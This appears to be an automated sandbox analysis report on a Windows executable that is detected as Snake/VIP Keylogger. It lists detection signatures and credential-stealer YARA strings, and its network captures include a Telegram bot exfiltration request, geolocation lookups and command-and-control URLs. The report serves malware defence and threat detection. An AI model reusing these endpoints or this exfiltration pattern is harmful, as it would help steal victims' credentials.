
Windows Analysis Report
new order 00041221.exe

Overview

General Information

Sample name: new order 00041221.exe
Analysis ID: 1482843
MD5: f0c82f395d37fa87114ca7ef075695c8
SHA1: 06df165721ef1544251108d1af927786ea7de870
SHA256: d954045a10b2292df4e754ad6f1c5350c82ce0a75d2cd9275ada797eca2c413f
Tags: exe, Payment

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • new order 00041221.exe (PID: 1000 cmdline: "C:\Users\user\Desktop\new order 00041221.exe" MD5: F0C82F395D37FA87114CA7EF075695C8)
    • new order 00041221.exe (PID: 5292 cmdline: "C:\Users\user\Desktop\new order 00041221.exe" MD5: F0C82F395D37FA87114CA7EF075695C8)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution | - | https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown | see strings below
  • 0x2d526:$a1: get_encryptedPassword
  • 0x2d843:$a2: get_encryptedUsername
  • 0x2d336:$a3: get_timePasswordChanged
  • 0x2d43f:$a4: get_passwordField
  • 0x2d53c:$a5: set_encryptedPassword
  • 0x2ec15:$a7: get_logins
  • 0x2eb78:$a10: KeyLoggerEventArgs
  • 0x2e7dd:$a11: KeyLoggerEventArgsEventHandler
Source | Rule | Description | Author | Strings
1.2.new order 00041221.exe.3859970.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
1.2.new order 00041221.exe.3859970.3.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
1.2.new order 00041221.exe.3859970.3.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
1.2.new order 00041221.exe.3859970.3.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
1.2.new order 00041221.exe.3859970.3.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

System Summary

Source: Network Connection | Author: frack113 | Data: DestinationIp: 203.124.44.4, DestinationIsIpv6: false, DestinationPort: 2525, EventID: 3, Image: C:\Users\user\Desktop\new order 00041221.exe, Initiated: true, ProcessId: 5292, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49727
No Snort rule has matched
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
2024-07-26T09:03:24.118819+0200 | 2803305 | 49720 | 443 | TCP | Unknown Traffic
2024-07-26T09:03:09.919075+0200 | 2803305 | 49706 | 443 | TCP | Unknown Traffic
2024-07-26T09:03:45.702091+0200 | 2022930 | 443 | 55797 | TCP | A Network Trojan was detected
2024-07-26T09:03:10.643717+0200 | 2803274 | 49707 | 80 | TCP | Potentially Bad Traffic
2024-07-26T09:03:09.300053+0200 | 2803274 | 49702 | 80 | TCP | Potentially Bad Traffic
2024-07-26T09:03:24.465395+0200 | 2022930 | 443 | 49717 | TCP | A Network Trojan was detected
2024-07-26T09:03:06.940575+0200 | 2803274 | 49702 | 80 | TCP | Potentially Bad Traffic
2024-07-26T09:03:44.316920+0200 | 2022930 | 443 | 55796 | TCP | A Network Trojan was detected


AV Detection

Source: http://anotherarmy.dns.army:8081 | Avira URL Cloud: Label: malware
Source: http://aborters.duckdns.org:8081 | Virustotal: Detection: 11%
Source: http://varders.kozow.com:8081 | Virustotal: Detection: 14%
Source: http://anotherarmy.dns.army:8081 | Virustotal: Detection: 14%
Source: new order 00041221.exe | Virustotal: Detection: 41%
Source: new order 00041221.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: new order 00041221.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
                    Source: new order 00041221.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49703 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49726 version: TLS 1.2
                    Source: new order 00041221.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 0127F2EDh3_2_0127F150
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 0127F2EDh3_2_0127F33C
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 0127FAA9h3_2_0127F7F1
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A331E8h3_2_05A32DC0
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3F471h3_2_05A3F1C8
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A331E8h3_2_05A32DD0
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A331E8h3_2_05A33116
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3EBC1h3_2_05A3E918
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A32C21h3_2_05A32970
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3F019h3_2_05A3ED70
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3E769h3_2_05A3E4C0
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3DEB9h3_2_05A3DC10
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3E311h3_2_05A3E068
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_05A30040
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_05A30853
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3DA61h3_2_05A3D7B8
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A30D0Dh3_2_05A30B30
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A31697h3_2_05A30B30
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3D1B1h3_2_05A3CF08
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3D609h3_2_05A3D360
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3F8C9h3_2_05A3F620
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_05A30673
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3FD21h3_2_05A3FA78

Networking

Source: unknown | DNS query: name: api.telegram.org
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.7:49727 -> 203.124.44.4:2525
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2027/07/2024%20/%2000:07:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | IP Address: 193.122.6.168
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49703 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2027/07/2024%20/%2000:07:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficDNS traffic detected: DNS query: mail.moonbrosurgical.com
                    Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 26 Jul 2024 07:03:27 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                    Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.moonbrosurgical.com
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0Q
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3716273829.0000000006678000.00000004.00000020.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3716273829.0000000006678000.00000004.00000020.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20a
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000003074000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000003065000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.00000000030A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000003065000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en0
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.000000000306F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002F9F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
                    Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002F9F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000003096000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/0
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
